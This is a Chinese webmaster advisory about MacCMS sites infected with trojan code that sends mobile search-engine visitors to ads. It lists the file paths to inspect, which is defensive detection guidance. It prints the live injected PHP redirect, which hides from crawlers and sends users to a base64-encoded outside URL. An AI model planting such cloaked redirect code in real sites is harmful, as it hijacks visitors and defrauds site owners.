苹果CMS网站被挂马，搜索引擎进来跳转广告？随机触发跳转怎么办-知新网

------正文内容展示，开始汲取新知识啦------

影视行业用苹果CMS做站的人比较多，不少人在不愿意接广告情况下被强制挂马。

这种木马最常见在什么目录呢？建议每个站长都排查一下下面路径文件，没流量就不用查了

搜索引擎跳转广告就查
thinkphp/start.php
下面是木马重定向代码，根据条件随机触发跳转

$agentt = strtolower($_SERVER['HTTP_USER_AGENT']);
if(stripos($agentt,'spider') == false && stripos($agentt,'bot')== false) {
if(strpos($agentt, 'ios') || stripos($agentt, 'android') || stripos($agentt, 'iphone') || stripos($agentt, 'ipad'))        {
$laiyuan=@strtolower($_SERVER['HTTP_REFERER']);
if (strpos($laiyuan, 'baidu') || stripos($laiyuan, '360')|| stripos($laiyuan, 'google')|| stripos($laiyuan, 'cn')|| stripos($laiyuan, 'com') ||stripos($laiyuan, 'sogou') || stripos($laiyuan, 'so'))  {
$new_url=base64_decode('aHR0cHM6Ly9oZXhpZXlzLmNvbS9nLnBocA==');
header("Location:$new_url");
exit;
}   
}
}

其他常见挂马文件路径

application/extra/

static/js/player.js

static/js/jquery.js

温馨提示：本文最后更新于2024-03-25 01:36:44，某些文章具有时效性，若有错误或已失效，请私信客服或联系知新社长。

------本文内容已结束，喜欢请分享------

感谢您的访问，Ctrl+D收藏本站吧。

相关声明 1、本站名称：知新网
2、本站永久网址：https://www.uzhix.com
3、本站部分内容源于网络和用户投稿，仅供学习与参考，如有侵权，请联系站长进行删除处理。
4、用户评论和发布内容，并不代表本站赞同其观点和对其真实性负责。
5、本站禁止以任何方式发布或转载任何违法的相关信息。
6、资源大多存储在云盘，如发现链接失效，请联系我们替换更新。

三月 25